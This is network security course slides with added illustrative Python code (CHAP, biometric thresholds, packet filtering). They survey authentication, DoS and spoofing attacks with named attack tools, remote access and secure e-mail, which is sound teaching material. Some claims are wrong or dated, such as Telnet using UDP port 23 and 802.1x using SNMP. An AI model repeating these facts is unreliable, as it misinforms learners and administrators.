8/3/2019 All Network Security
Guide to Network Security Fundamentals

Chapter 1

Learning Objectives
- Understand network security
- Understand security threat trends and their ramifications
- Understand the goals of network security
- Determine the factors involved in a secure network strategy

Understanding Network Security
- Network security
  o Process by which digital information assets are protected
- Goals
  o Maintain integrity
  o Protect confidentiality
  o Assure availability
Understanding Network Security (continued)
- Security ensures that users:
  o Perform only tasks they are authorized to do
  o Obtain only information they are authorized to have
  o Cannot cause damage to data, applications, or operating environment

Security Threats
- Identity theft
- Privacy concerns
- Wireless access

To Offset Security Threats
- Integrity
  o Assurance that data is not altered or destroyed in an unauthorized manner
- Confidentiality
  o Protection of data from unauthorized disclosure to a third party
- Availability
  o Continuous operation of computing systems

Security Ramifications: Costs of Intrusion
- Causes of network security threats
  o Technology weaknesses
  o Configuration weaknesses
  o Policy weaknesses
  o Human error
Technology Weaknesses
- TCP/IP
- Operating systems
- Network equipment

Configuration Weaknesses
- Unsecured accounts
- System accounts with easily guessed passwords
- Misconfigured Internet services
- Unsecured default settings
- Misconfigured network equipment
- Trojan horse programs
- Vandals
- Viruses

Policy Weaknesses
- Lack of a written security policy
- Politics
- High turnover
- Concise access controls not applied
- Software and hardware installation and changes do not follow policy
- Proper security
- Nonexistent disaster recovery plan

Human Error
- Accident
- Ignorance
- Workload
- Dishonesty
- Impersonation
- Disgruntled employees
- Snoops
- Denial-of-service attacks
Goals of Network Security
- Achieve the state where any action that is not expressly permitted is prohibited
  o Eliminate theft
  o Determine authentication
  o Identify assumptions
  o Control secrets

Creating a Secure Network Strategy
- Address both internal and external threats
- Define policies and procedures
- Reduce risk across perimeter security, the Internet, intranets, and LANs

Creating a Secure Network Strategy (continued)
- Human factors
- Know your weaknesses
- Limit access
- Achieve security through persistence
  o Develop change management process
- Remember physical security
- Perimeter security
  o Control access to critical network applications, data, and services

Creating a Secure Network Strategy (continued)
- Firewalls
  o Prevent unauthorized access to or from private network
  o Create protective layer between network and outside world
  o Replicate network at point of entry in order to receive and transmit authorized data
  o Have built-in filters
  o Log attempted intrusions and create reports
Creating a Secure Network Strategy (continued)
- Web and file servers
- Access control
  o Ensures that only legitimate traffic is allowed into or out of the network
  o Passwords, PINs, smartcards

Creating a Secure Network Strategy (continued)
- Change management
  o Document changes to all areas of IT infrastructure
- Encryption
  o Ensures messages cannot be intercepted or read by anyone other than the intended person(s)

Creating a Secure Network Strategy (continued)
- Intrusion detection system (IDS)
  o Provides 24/7 network surveillance
  o Analyzes packet data streams within the network
  o Searches for unauthorized activity

Chapter Summary
- Understanding network security
- Security threats
- Security ramifications
- Goals of network security
- Creating a secure network strategy
Chapter 2
Authentication

Learning Objectives
- Create strong passwords and store them securely
- Understand the Kerberos authentication process
- Understand how CHAP works
- Understand what mutual authentication is and why it is necessary
- Understand how digital certificates are created and why they are used
- Understand what tokens are and how they function
- Understand biometric authentication processes and their strengths and weaknesses
- Understand the benefits of multifactor authentication

Security of System Resources
- Three-step process (AAA)
  o Authentication: positive identification of person/system seeking access to secured information/services
  o Authorization: predetermined level of access to resources
  o Accounting: logging use of each asset
Authentication Techniques
- Usernames and passwords
- Kerberos
- Challenge Handshake Authentication Protocol (CHAP)
- Mutual authentication
- Digital certificates
- Tokens
- Biometrics
- Multifactor authentication

Usernames and Passwords
- Username
  o Unique alphanumeric identifier used to identify an individual when logging onto a computer/network
- Password
  o Secret combination of keystrokes that, when combined with a username, authenticates a user to a computer/network

Basic Rules for Password Protection
1. Memorize passwords; do not write them down
2. Use different passwords for different functions
3. Use at least 6 characters
4. Use a mixture of uppercase and lowercase letters, numbers, and other characters
5. Change periodically

Strong Password Creation Techniques
- Easy to remember; difficult to recognize
- Examples:
  o First letters of each word of a simple phrase; add a number and punctuation: Asb4M?
  o Combine two dissimilar words and place a number between them: SleigH9ShoE
  o Substitute numbers for letters (not obviously)
Techniques to Use Multiple Passwords
- Group Web sites or applications by appropriate level of security
  o Use a different password for each group
  o Cycle more complex passwords down the groups, from most sensitive to least

Storing Passwords
- Written
  o Keep in a place you are not likely to lose it
  o Use small type
  o Develop a personal code to apply to the list
- Electronic
  o Use a specifically designed application (encrypts data)
Kerberos
- Provides secure and convenient way to access data and services through:
  o Session keys
  o Tickets
  o Authenticators
  o Authentication servers
  o Ticket-granting tickets
  o Ticket-granting servers
  o Cross-realm authentication

Kerberos in a Simple Environment
- Session key
  o Secret key used during logon session between client and a service
- Ticket
  o Set of electronic information used to authenticate identity of a principal to a service
- Authenticator
  o Device (e.g., PPP network server) that requires authentication from a peer and specifies authentication protocol used in the configure request during link establishment phase

Kerberos in a Simple Environment (continued)
- Checksum
  o Small, fixed-length numerical value
  o Computed as a function of an arbitrary number of bits in a message
  o Used to verify authenticity of sender

(Figure: Kerberos in a Simple Environment)
Kerberos in a More Complex Environment
- Ticket-granting ticket (TGT)
  o Data structure that acts as an authenticating proxy to principal's master key for set period of time
- Ticket-granting server (TGS)
  o Server that grants ticket-granting tickets to a principal

(Figure: Kerberos in a More Complex Environment)

Kerberos in Very Large Network Systems
- Cross-realm authentication
  o Allows principal to authenticate itself to gain access to services in a distant part of a Kerberos system

(Figure: Cross-Realm Authentication)

Security Weaknesses of Kerberos
- Does not solve password-guessing attacks
- Must keep password secret
- Does not prevent denial-of-service attacks
- Internal clocks of authenticating devices must be loosely synchronized
- Authenticating device identifiers must not be recycled on a short-term basis
Challenge Handshake Authentication Protocol (CHAP)
- PPP mechanism used by an authenticator to authenticate a peer
- Uses an encrypted challenge-and-response sequence

(Figure: CHAP Challenge-and-Response Sequence)

CHAP Security Benefits
- Multiple authentication sequences throughout Network layer protocol session
  o Limit time of exposure to any single attack
- Variable challenge values and changing identifiers
  o Provide protection against playback attacks

CHAP Security Issues
- Passwords should not be the same in both directions
- Not all implementations of CHAP terminate the link when authentication process fails, but instead limit traffic to a subset of Network layer protocols
  o Possible for users to update passwords
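The following is an added simulation of the CHAP exchange, not code from the slides or from any PPP implementation. It follows RFC 1994, where the response is the MD5 hash of the one-octet Identifier, the shared secret and the Challenge (the slide's "encrypted" sequence is really this one-way hash). The peer name, secret and traffic are constructed; the point it shows is why a fresh identifier and challenge per round defeat the playback attack the slides mention, and why the secret itself never crosses the link.

```python
import hashlib
import hmac
import os


def chap_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
    """RFC 1994 CHAP response: MD5 over Identifier || secret || Challenge."""
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()


class Authenticator:
    """The PPP authenticator side: issues challenges and checks responses."""

    def __init__(self, peer_secrets: dict):
        self.peer_secrets = peer_secrets   # peer name -> shared secret
        self.outstanding = {}              # identifier -> challenge awaiting a response
        self.next_id = 0

    def challenge(self):
        # A new identifier and a new random challenge on every round, so a
        # response captured earlier never matches a later challenge.
        identifier = self.next_id
        self.next_id = (self.next_id + 1) % 256
        value = os.urandom(16)
        self.outstanding[identifier] = value
        return identifier, value

    def verify(self, identifier: int, name: str, response: bytes) -> bool:
        # Each challenge is consumed on first use, whatever the outcome.
        challenge = self.outstanding.pop(identifier, None)
        secret = self.peer_secrets.get(name)
        if challenge is None or secret is None:
            return False
        expected = chap_response(identifier, secret, challenge)
        return hmac.compare_digest(expected, response)


class Peer:
    """The side being authenticated: proves it knows the secret without sending it."""

    def __init__(self, name: str, secret: bytes):
        self.name, self.secret = name, secret

    def respond(self, identifier: int, challenge: bytes):
        return self.name, chap_response(identifier, self.secret, challenge)


def run_exchange():
    """Constructed scenario: a legitimate round, a replay of the captured
    response, and a peer that only guessed the secret."""
    auth = Authenticator({"branch-router": b"constructed-shared-secret"})
    peer = Peer("branch-router", b"constructed-shared-secret")

    ident, chal = auth.challenge()
    name, resp = peer.respond(ident, chal)
    first_ok = auth.verify(ident, name, resp)

    # Someone who sniffed (ident, resp) replays it; the challenge was consumed
    # and the next round carries a different identifier and value.
    auth.challenge()
    replay_ok = auth.verify(ident, name, resp)

    ident3, chal3 = auth.challenge()
    impostor = Peer("branch-router", b"guessed-secret")
    _, bad = impostor.respond(ident3, chal3)
    wrong_secret_ok = auth.verify(ident3, name, bad)

    return first_ok, replay_ok, wrong_secret_ok


if __name__ == "__main__":
    print(run_exchange())   # (True, False, False)
```

The second CHAP security issue on the slide (a different secret in each direction) corresponds to giving the `Authenticator` and `Peer` roles on each end distinct secrets; the code above models only one direction.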
Mutual Authentication
- Process by which each party in an electronic communication verifies the identity of the other party

Digital Certificates
- Electronic means of verifying identity of an individual/organization
- Digital signature
  o Piece of data that claims that a specific, named individual wrote or agreed to the contents of an electronic document to which the signature is attached

Electronic Encryption and Decryption Concepts
- Encryption
  o Converts plain text message into secret message
- Decryption
  o Converts secret message into plain text message
- Symmetric cipher
  o Uses only one key
- Asymmetric cipher
  o Uses a key pair (private key and public key)

Electronic Encryption and Decryption Concepts (continued)
- Certificate authority (CA)
  o Trusted, third-party entity that verifies the actual identity of an organization/individual before providing a digital certificate
- Nonrepudiation
  o Practice of using a trusted, third-party entity to verify the authenticity of a party who sends a message
How Much Trust Should One Place in a CA?
- Reputable CAs have several levels of authentication that they issue based on the amount of data collected from applicants
- Example: VeriSign

Security Tokens
- Authentication devices assigned to specific user
- Small, credit card-sized physical devices
- Incorporate two-factor authentication methods
- Utilize base keys that are much stronger than short, simple passwords a person can remember

Types of Security Tokens
- Passive
  o Act as a storage device for the base key
  o Do not emit, or otherwise share, base tokens
- Active
  o Actively create another form of a base key or encrypted form of a base key that is not subject to attack by sniffing and replay
  o Can provide variable outputs in various circumstances

One-Time Passwords
- Used only once for limited period of time; then is no longer valid
- Uses shared keys and challenge-and-response systems, which do not require that the secret be transmitted or revealed
- Strategies for generating one-time passwords
  o Counter-based tokens
  o Clock-based tokens
Biometrics
- Biometric authentication
  o Uses measurements of physical or behavioral characteristics of an individual
  o Generally considered most accurate of all authentication methods
  o Traditionally used in highly secure areas
  o Expensive

How Biometric Authentication Works
1. Biometric is scanned after identity is verified
2. Biometric information is analyzed and put into an electronic template
3. Template is stored in a repository
4. To gain access, biometric is scanned again
5. Computer analyzes biometric data and compares it to data in template
6. If data from scan matches data in template, person is allowed access
7. Keep a record, following AAA model

False Positives and False Negatives
- False positive
  o Occurrence of an unauthorized person being authenticated by a biometric authentication process
- False negative
  o Occurrence of an authorized person not being authenticated by a biometric authentication process when they are who they claim to be
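Step 5 of the process above compares a live scan to a stored template, and in practice that comparison is a similarity score checked against a threshold. The block below is an added illustration (not from the slides, and not any vendor's matcher) using the slide's own terms: it computes the false-positive and false-negative rates for a constructed set of genuine and impostor scores, shows that moving the threshold trades one error for the other, and finds the threshold at which the two rates are closest.

```python
from typing import Sequence, Tuple

# Constructed matcher scores in [0, 1]; higher means the live scan resembles
# the stored template more closely. Genuine = authorized users presenting
# their own biometric, impostor = unauthorized people trying to pass.
GENUINE_SCORES = [0.92, 0.88, 0.75, 0.61, 0.55, 0.47, 0.83, 0.70]
IMPOSTOR_SCORES = [0.12, 0.30, 0.45, 0.52, 0.20, 0.38, 0.58, 0.25]


def error_rates(genuine: Sequence[float], impostor: Sequence[float],
                threshold: float) -> Tuple[float, float]:
    """Return (false_positive_rate, false_negative_rate) at one threshold.

    False positive (slide definition): an unauthorized person is accepted,
    i.e. an impostor score reaches the threshold.
    False negative: an authorized person is rejected, i.e. a genuine score
    falls below it.
    """
    false_positives = sum(1 for s in impostor if s >= threshold)
    false_negatives = sum(1 for s in genuine if s < threshold)
    return false_positives / len(impostor), false_negatives / len(genuine)


def trade_off(genuine: Sequence[float], impostor: Sequence[float],
              thresholds: Sequence[float]):
    """Error rates at each candidate threshold, for inspection."""
    return [(t, *error_rates(genuine, impostor, t)) for t in thresholds]


def equal_error_threshold(genuine: Sequence[float],
                          impostor: Sequence[float]) -> float:
    """Among the observed scores, the threshold where the two error rates are
    closest (the equal-error operating point). Ties go to the lower threshold."""
    candidates = sorted(set(genuine) | set(impostor))

    def gap(t: float):
        fpr, fnr = error_rates(genuine, impostor, t)
        return abs(fpr - fnr), t

    return min(candidates, key=gap)


if __name__ == "__main__":
    for t, fpr, fnr in trade_off(GENUINE_SCORES, IMPOSTOR_SCORES,
                                 [0.4, 0.5, 0.55, 0.6, 0.7]):
        print(f"threshold {t:.2f}: false positive {fpr:.3f}, false negative {fnr:.3f}")
    print("equal-error threshold:", equal_error_threshold(GENUINE_SCORES, IMPOSTOR_SCORES))
```

A high-security area (the slide's traditional use) would sit to the right of the equal-error point, accepting more false negatives to drive false positives toward zero; a convenience deployment would sit to the left.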
Different Kinds of Biometrics
- Physical characteristics
  o Fingerprints
  o Hand geometry
  o Retinal scanning
  o Iris scanning
  o Facial scanning
- Behavioral characteristics
  o Handwritten signatures
  o Voice

(Figures: Fingerprint Biometrics; Hand Geometry Authentication; Retinal Scanning; Iris Scanning; Signature Verification)

General Trends in Biometrics
- Authenticating large numbers of people over a short period of time (e.g., smart cards)
- Gaining remote access to controlled areas

Multifactor Authentication
- Identity of individual is verified using at least two of the three factors of authentication
  o Something you know (e.g., password)
  o Something you have (e.g., smart card)
  o Something about you (e.g., biometrics)

Chapter Summary
- Authentication techniques
  o Usernames and passwords
  o Kerberos
  o CHAP
  o Mutual authentication
  o Digital certificates
  o Tokens
  o Biometrics
  o Multifactor authentication
Chapter 3
Attacks and Malicious Code

Learning Objectives
- Explain denial-of-service (DoS) attacks
- Explain and discuss ping-of-death attacks
- Identify major components used in a DDoS attack and how they are installed
- Understand major types of spoofing attacks
- Discuss man-in-the-middle attacks, replay attacks, and TCP session hijacking
- Detail three types of social-engineering attacks and explain why they can be incredibly damaging
- List major types of attacks used against encrypted data
- List major types of malicious software and identify a countermeasure for each one

Denial-of-Service Attacks
- Any malicious act that causes a system to be unusable by its real user(s)
- Take numerous forms
- Are very common
- Can be very costly
- Major types
  o SYN flood
  o Smurf attack
SYN Flood
- Exploits the TCP three-way handshake
- Inhibits server's ability to accept new TCP connections

(Figure: TCP Three-Way Handshake)

Smurf
- Non-OS specific attack that uses the network to amplify its effect on the victim
- Floods a host with ICMP
- Saturates Internet connection with bogus traffic and delays/prevents legitimate traffic from reaching its destination

IP Fragmentation Attacks: Ping of Death
- Uses IP packet fragmentation techniques to crash remote systems

(Figure: Ping of Death)

Distributed Denial-of-Service Attacks
- Use hundreds of hosts on the Internet to attack the victim by flooding its link to the Internet or depriving it of resources
- Used by hackers to target government and business Internet sites
- Automated tools; can be executed by script kiddies
- Result in temporary loss of access to a given site and associated loss in revenue and prestige
(Figure: Conducting DDoS Attacks)

DDoS Countermeasures
- Security patches from software vendors
- Antivirus software
- Firewalls
- Ingress (inbound) and egress (outbound) filtering

(Figure: Ingress and Egress Filtering)

Preventing the Network from Inadvertently Attacking Others
- Filter packets coming into the network destined for a broadcast address
- Turn off directed broadcasts on internal routers
- Block any packet from entering the network that has a source address that is not permissible on the Internet (see Figures 3-8 and 3-9)
- Block at the firewall any packet that uses a protocol or port that is not used for Internet communications on the network
- Block packets with a source address originating inside your network from entering your network

(Figure: Ingress Filtering of Packets with RFC 1918 Addresses)

(Figure: Filtering of Packets with RFC 2827 Addresses)
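The following is an added worked example of the ingress and egress rules listed above, written here for illustration; it is not code from the slides or from any router or firewall product. It models a site edge with a constructed prefix (203.0.113.0/24, a documentation range standing in for a real allocation) and applies the rules as Python checks: drop inbound packets with RFC 1918 or other non-routable sources, drop inbound packets that claim a source inside our own prefix, drop inbound packets aimed at our broadcast address (the Smurf amplification case), and, per RFC 2827, let only our own prefix leave as a source. The sample packets are constructed.

```python
import ipaddress
from typing import List, Tuple

# Constructed topology: the prefix assigned to this site.
SITE_PREFIX = ipaddress.ip_network("203.0.113.0/24")

# Source addresses that are never valid when arriving from the Internet.
RFC1918 = [ipaddress.ip_network(p)
           for p in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
OTHER_NON_ROUTABLE = [ipaddress.ip_network(p)
                      for p in ("127.0.0.0/8", "0.0.0.0/8")]

Verdict = Tuple[str, str]   # ("allow" | "drop", reason)


def ingress_verdict(src: str, dst: str) -> Verdict:
    """Inbound (Internet -> site) check."""
    s, d = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    if any(s in net for net in RFC1918):
        return "drop", "RFC 1918 source address"
    if any(s in net for net in OTHER_NON_ROUTABLE):
        return "drop", "non-routable source address"
    if s in SITE_PREFIX:
        return "drop", "source claims to be inside our own network"
    if d == SITE_PREFIX.broadcast_address:
        return "drop", "directed broadcast to our subnet (Smurf amplifier)"
    return "allow", "ok"


def egress_verdict(src: str, dst: str) -> Verdict:
    """Outbound (site -> Internet) check, RFC 2827 style: only our own prefix
    may appear as a source, so a compromised inside host cannot spoof."""
    s = ipaddress.ip_address(src)
    if s not in SITE_PREFIX:
        return "drop", "source address not in our prefix (spoofed)"
    return "allow", "ok"


def apply_filters(packets: List[Tuple[str, str, str]]):
    """packets: (direction 'in'|'out', source, destination)."""
    results = []
    for direction, src, dst in packets:
        check = ingress_verdict if direction == "in" else egress_verdict
        verdict, reason = check(src, dst)
        results.append((direction, src, dst, verdict, reason))
    return results


# Constructed sample traffic.
SAMPLE_PACKETS = [
    ("in", "198.51.100.7", "203.0.113.10"),    # ordinary inbound traffic
    ("in", "10.1.2.3", "203.0.113.10"),        # RFC 1918 source from the Internet
    ("in", "203.0.113.5", "203.0.113.10"),     # our own address arriving from outside
    ("in", "198.51.100.7", "203.0.113.255"),   # directed broadcast to our subnet
    ("out", "203.0.113.20", "198.51.100.7"),   # legitimate outbound
    ("out", "192.0.2.99", "198.51.100.7"),     # spoofed source leaving our network
]


def drop_count(packets=SAMPLE_PACKETS) -> int:
    return sum(1 for r in apply_filters(packets) if r[3] == "drop")


if __name__ == "__main__":
    for direction, src, dst, verdict, reason in apply_filters(SAMPLE_PACKETS):
        print(f"{direction:3} {src:>14} -> {dst:<14} {verdict:5} {reason}")
```

Turning off directed broadcasts on internal routers (the second bullet) is a router setting rather than a filter rule, so it has no counterpart here; the broadcast check above is the edge-filter half of that countermeasure.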
Spoofing
- Act of falsely identifying a packet's IP address, MAC address, etc.
- Four primary types
  o IP address spoofing
  o ARP poisoning
  o Web spoofing
  o DNS spoofing

IP Address Spoofing
- Used to exploit trust relationships between two hosts
- Involves creating IP packets with a forged source address

ARP Poisoning
- Used in man-in-the-middle and session hijacking attacks; attacker takes over victim's IP address by corrupting ARP caches of directly connected machines
- Attack tools
  o ARPoison
  o Ettercap
  o Parasite

Web Spoofing
- Convinces victim that he or she is visiting a real and legitimate site
- Considered both a man-in-the-middle attack and a denial-of-service attack

(Figure: Web Spoofing)

DNS Spoofing
- Aggressor poses as the victim's legitimate DNS server
- Can direct users to a compromised server
- Can redirect corporate e-mail through a hacker's server where it can be copied or modified before sending mail to final destination
To Thwart Spoofing Attacks
- IP spoofing
  o Disable source routing on all internal routers
  o Filter out packets entering local network from the Internet that have a source address of the local network
- ARP poisoning
  o Use network switches that have MAC binding features
- Web spoofing
  o Educate users
- DNS spoofing
  o Thoroughly secure DNS servers
  o Deploy anti-IP address spoofing measures
Man in the Middle
- Class of attacks in which the attacker places himself between two communicating hosts and listens in on their session
- To protect against
  o Configure routers to ignore ICMP redirect packets

(Figure: Man-in-the-Middle Attacks)

Man-in-the-Middle Applications
- Web spoofing
- TCP session hijacking
- Information theft
- Other attacks (denial-of-service attacks, corruption of transmitted data, traffic analysis to gain information about victim's network)

Man-in-the-Middle Methods
- ARP poisoning
- ICMP redirects
- DNS poisoning

Replay Attacks
- Attempts to circumvent authentication mechanisms by:
  o Recording authentication messages from a legitimate user
  o Reissuing those messages in order to impersonate the user and gain access to systems
(Figure: Replay Attack)

TCP Session Hijacking
- Attacker uses techniques to make the victim believe he or she is connected to a trusted host, when in fact the victim is communicating with the attacker
- Well-known tool
  o Hunt (Linux)

(Figure: Attacker Using Victim's TCP Connection)

Social Engineering
- Class of attacks that uses trickery on people instead of computers
- Goals
  o Fraud
  o Network intrusion
  o Industrial espionage
  o Identity theft
  o Desire to disrupt the system or network

(Figure: Dumpster Diving)

Online Attacks
- Use chat and e-mail venues to exploit trust relationships

Social Engineering Countermeasures
- Take proper care of trash and discarded items
- Ensure that all system users have periodic training about network security
Attacks Against Encrypted Data
- Weak keys
- Mathematical attacks
- Birthday attack
- Password guessing
  o Brute force
  o Dictionary

Weak Keys
- Secret keys used in encryption that exhibit regularities in encryption, or even a poor level of encryption

Mathematical Attack
- Attempts to decrypt encrypted data using mathematics to find weaknesses in the encryption algorithm
- Categories of cryptanalysis
  o Ciphertext-only analysis
  o Known plaintext attack
  o Chosen plaintext attack

Birthday Attack
- Class of brute-force mathematical attacks that exploits mathematical weaknesses of hash algorithms and one-way hash functions
Password Guessing
- Tricks authentication mechanisms by determining a user's password using techniques such as brute force or dictionary attacks

Brute Force
- Method of breaking passwords that involves computation of every possible combination of characters for a password of a given character length

Dictionary
- Method of breaking passwords by using a predetermined list of words as input to the password hash
- Only works against poorly chosen passwords

Software Exploitation
- Utilizes software vulnerabilities to gain access and compromise systems
- Example
  o Buffer overflow attack
- To stop software exploits
  o Stay apprised of latest security patches provided by software vendors
Malicious Software

Viruses
- Self-replicating programs that spread by infecting other programs
- Damaging and costly

(Figure: Virus Databases)

(Figure: Evolution of Virus Propagation Techniques)

Protecting Against Viruses
- Enterprise virus protection solutions
  o Desktop antivirus programs
  o Virus filters for e-mail servers
  o Network appliances that detect and remove viruses
- Instill good behaviors in users and system administrators
  o Keep security patches and virus signature databases up to date

Trojan Horses
- Class of malware that uses social engineering to spread
- Types of methods
  o Sending copies of itself to all recipients in user's address book
  o Deleting or modifying files
  o Installing backdoor/remote control programs

Logic Bombs
- Set of computer instructions that lie dormant until triggered by a specific event
- Once triggered, the logic bomb performs a malicious task
- Almost impossible to detect until after triggered
- Often the work of former employees
- For example: macro virus
  o Uses auto-execution feature of specific applications
Worms
- Self-contained program that uses security flaws such as buffer overflows to remotely compromise a victim and replicate itself to that system
- Do not infect other executable programs
- Account for 80% of all malicious activity on Internet
- Examples: Code Red, Code Red II, Nimda

Defense Against Worms
- Latest security updates for all servers
- Network and host-based IDS
- Antivirus programs

Chapter Summary
- Mechanisms, countermeasures, and best practices for:
  o Malicious software
  o Denial-of-service attacks
  o Software exploits
  o Social engineering
  o Attacks on encrypted data
Chapter 4
Remote Access

Learning Objectives
- Understand implications of IEEE 802.1x and how it is used
- Understand VPN technology and its uses for securing remote access to networks
- Understand how RADIUS authentication works
- Understand how TACACS+ operates
- Understand how PPTP works and when it is used
- Understand how L2TP works and when it is used
- Understand how SSH operates and when it is used
- Understand how IPSec works and when it is used
- Understand the vulnerabilities associated with telecommuting

IEEE 802.1x
- Internet standard created to perform authentication services for remote access to a central LAN
- Uses SNMP to define levels of access control and behavior of ports providing remote access to LAN environment
- Uses EAP over LAN (EAPOL) encapsulation method

(Figure: 802.1x General Topology)
Telnet
- Standard terminal emulation protocol within TCP/IP protocol suite defined by RFC 854
- Utilizes UDP port 23 to communicate
- Allows users to log on to remote networks and use resources as if locally connected

Controlling Telnet
- Assign enable password as initial line of defense
- Use access lists that define who has access to what resources based on specific IP addresses
- Use a firewall that can filter traffic based on ports, IP addresses, etc.

Virtual Private Network
- Secures connection between user and home office using authentication mechanisms and encryption techniques
  o Encrypts data at both ends
- Uses two technologies
  o IPSec
  o PPTP

(Figure: VPN Diagram)

Tunneling
- Enables one network to send its data via another network's connections
- Encapsulates a network protocol within packets carried by the second network

(Figure: Tunneling)

VPN Options
- Install/configure client computer to initiate necessary security communications
- Outsource VPN to a service provider
  o Encryption does not happen until data reaches provider's network

(Figure: Service Providing Tunneling)
VPN Drawbacks
- Not completely fault tolerant
- Diverse implementation choices
  o Software solutions: tend to have trouble processing all the simultaneous connections on a large network
  o Hardware solutions: require higher costs

Remote Authentication Dial-in User Service (RADIUS)
- Provides a client/server security system
- Uses distributed security to authenticate users on a network
- Includes two pieces
  o Authentication server
  o Client protocols
- Authenticates users through a series of communications between client and server using UDP

(Figure: Authenticating with a RADIUS Server)

Benefits of Distributed Approach to Network Security
- Greater security
- Scalable architecture
- Open protocols
- Future enhancements
Terminal Access Controller Access Control System (TACACS+)
- Authentication protocol developed by Cisco
- Uses TCP, a connection-oriented transmission, instead of UDP
- Offers separate acknowledgement that request has been received regardless of speed of authentication mechanism
- Provides immediate indication of a crashed server

Advantages of TACACS+ over RADIUS
- Addresses need for scalable solution
- Separates authentication, authorization, and accounting
- Offers multiple protocol support

Point-to-Point Tunneling Protocol
- Multiprotocol that offers authentication, methods of privacy, and data compression
- Built upon PPP and TCP/IP
- Achieves tunneling by providing encapsulation (wraps packets of information within IP packets)
  o Data packets
  o Control packets
- Provides users with virtual node on corporate LAN or WAN

PPTP Tasks
- Queries status of communications servers
- Provides in-band management
- Allocates channels and places outgoing calls
- Notifies Windows NT Server of incoming calls
- Transmits and receives user data with bi-directional flow control
- Notifies Windows NT Server of disconnected calls
- Assures data integrity; coordinates packet flow

Layer Two Tunneling Protocol
- PPP defines an encapsulation mechanism for transporting multiprotocol packets across layer two point-to-point links
- L2TP extends PPP model by allowing layer two and PPP endpoints to reside on different devices interconnected by a packet-switched network
Layer Two Tunneling Protocol (continued)
- Allows separation of processing of PPP packets and termination of layer two circuit
  o Connection may terminate at a (local) circuit concentrator
- Solves splitting problems by projecting a PPP session to a location other than the point at which it is physically received

Secure Shell (SSH)
- Secure replacement for remote logon and file transfer programs (Telnet and FTP) that transmit data in unencrypted text
- Uses public key authentication to establish an encrypted and secure connection from user's machine to remote machine
- Used to:
  o Log on to another computer over a network
  o Execute commands on a remote machine
  o Move files from one machine to another

Key Components of an SSH Product
- Engine
- Administration server
- Enrollment gateway
- Publishing server

IP Security Protocol
- Set of protocols developed by the IETF to support secure exchange of packets at IP layer
- Deployed widely to implement VPNs
- Works with existing and future IP standards
- Transparent to users
- Promises painless scalability
- Handles encryption at packet level using Encapsulating Security Payload (ESP)

(Figure: IPSec Security Payload)

ESP and Encryption Models
- Supports many encryption protocols
- Encryption support is designed for use by symmetric encryption algorithms
- Provides secure VPN tunneling
Telecommuting Vulnerabilities
(Figures: Telecommuting Vulnerabilities, several slides)

Remote Solutions
- Microsoft Terminal Server
- Citrix Metaframe
- Virtual Network Computing
Chapter 5

Learning Objectives
- Understand the need for secure e-mail
- Outline benefits of PGP and S/MIME
- Understand e-mail vulnerabilities and how to safeguard against them
- Explain the dangers posed by e-mail hoaxes and spam, as well as actions that can be taken to counteract them

Challenges to Utility and Productivity Gains Offered by E-mail
- E-mail security
- Floods of spam
- Hoaxes

E-mail Security Technologies
- Two main standards
  o Pretty Good Privacy (PGP)
  o Secure/Multipurpose Internet Mail Extensions (S/MIME)
- These competing standards:
  o Seek to ensure integrity and privacy of information by wrapping security measures around e-mail data itself
  o Use public key encryption techniques (alternative to securing communication link itself, as in VPN)

Secure E-mail and Encryption
- Secure e-mail
  o Uses cryptography to secure messages transmitted across insecure networks
- Advantages of e-mail encryption
  o E-mail can be transmitted over unsecured links
  o E-mail can be stored in encrypted form
- Key cryptography concepts
  o Encryption
  o Digital signatures
  o Digital certificates

Main Features of Secure E-mail
- Confidentiality
- Integrity
- Authentication
- Nonrepudiation
Encryption
- Passes data and a value (key) through a series of mathematical formulas that make the data unusable and unreadable
- To recover information, reverse the process using the appropriate key
- Two main types
  o Conventional cryptography
  o Public key cryptography

(Figure: Encryption)

Hash Functions
- Produce a message digest that cannot be reversed to produce the original
- Two major hash functions in use
  o SHA-1 (Secure Hash Algorithm 1)
  o MD5 (Message Digest algorithm version 5)

Digital Signatures
- Electronic identification of a person or thing created by using a public key algorithm
- Verify (to a recipient) the integrity of data and identity of the sender
- Provide same features as encryption, except confidentiality
- Created by using hash functions

Digital Certificates
- Electronic document attached to a public key by a trusted third party
- Provide proof that the public key belongs to a legitimate owner and has not been compromised
- Consist of:
  o Owner's public key
  o Information unique to owner
  o Digital signatures of an endorser
8/3/2019 All Network Security
91/336
Combining Encryption Methods Hybrid cryptosystems
o Take advantage of symmetric and public keycryptography
o Example: PGP/MIME Conventional encryption
o Fast, but results in key distribution problem Public key encryption
o Private key and public key
8/3/2019 All Network Security
92/336
Public Key Encryption
How Secure E-mail Works Encryption
1.Message is compressed2.Session key is created3.Message is encrypted using session key with
symmetrical encryption method4.Session key is encrypted with an asymmetrical
encryption method5.Encrypted session key and encrypted message
are bound together and transmitted to recipient Decryption: reverse the process
8/3/2019 All Network Security
93/336
Secure E-mail Decryption
8/3/2019 All Network Security
94/336
Background on PGP
 Current de facto standard for e-mail encryption (the message format is now standardized as OpenPGP, RFC 4880)
 Written by Phil Zimmermann in 1991
 Supports major conventional encryption methods
o CAST
o International Data Encryption Algorithm (IDEA)
o Triple Data Encryption Standard (3DES)
o Twofish

PGP Certificates
 More flexible and extensible than X.509 certificates
 A single certificate can contain multiple signatures (anyone who has verified the key may sign it)
PGP Certificate Format
S/MIME
 Specification designed to add security to e-mail messages in MIME format
 Security services
o Authentication (using digital signatures)
o Privacy (using encryption)
What S/MIME Defines
 Format for MIME data
 Algorithms that must be used for interoperability
o RSA
o RC2
o SHA-1
 Additional operational concerns
o ANSI X.509 certificates
o Transport over the Internet

S/MIME Background
 Four primary standards (the version 3 set; they have since been superseded by RFC 5652 for CMS and by RFC 5750/5751 and later RFC 8550/8551 for S/MIME 3.2 and 4.0)
o RFC 2630 Cryptographic Message Syntax
o RFC 2633 S/MIME version 3 Message Specification
o RFC 2632 S/MIME version 3 Certificate Handling
o RFC 2634 Enhanced Security Services for S/MIME
S/MIME Encryption Algorithms
 Three symmetric encryption algorithms in version 3 (later versions add AES; DES and 40-bit RC2 are obsolete and should be refused)
o DES
o 3DES
o RC2
 PKCS (Public Key Cryptography Standards)
 S/MIME prevents exposure of signature information to an eavesdropper
o Applies the digital signature first; then encloses the signature and original message in an encrypted digital envelope
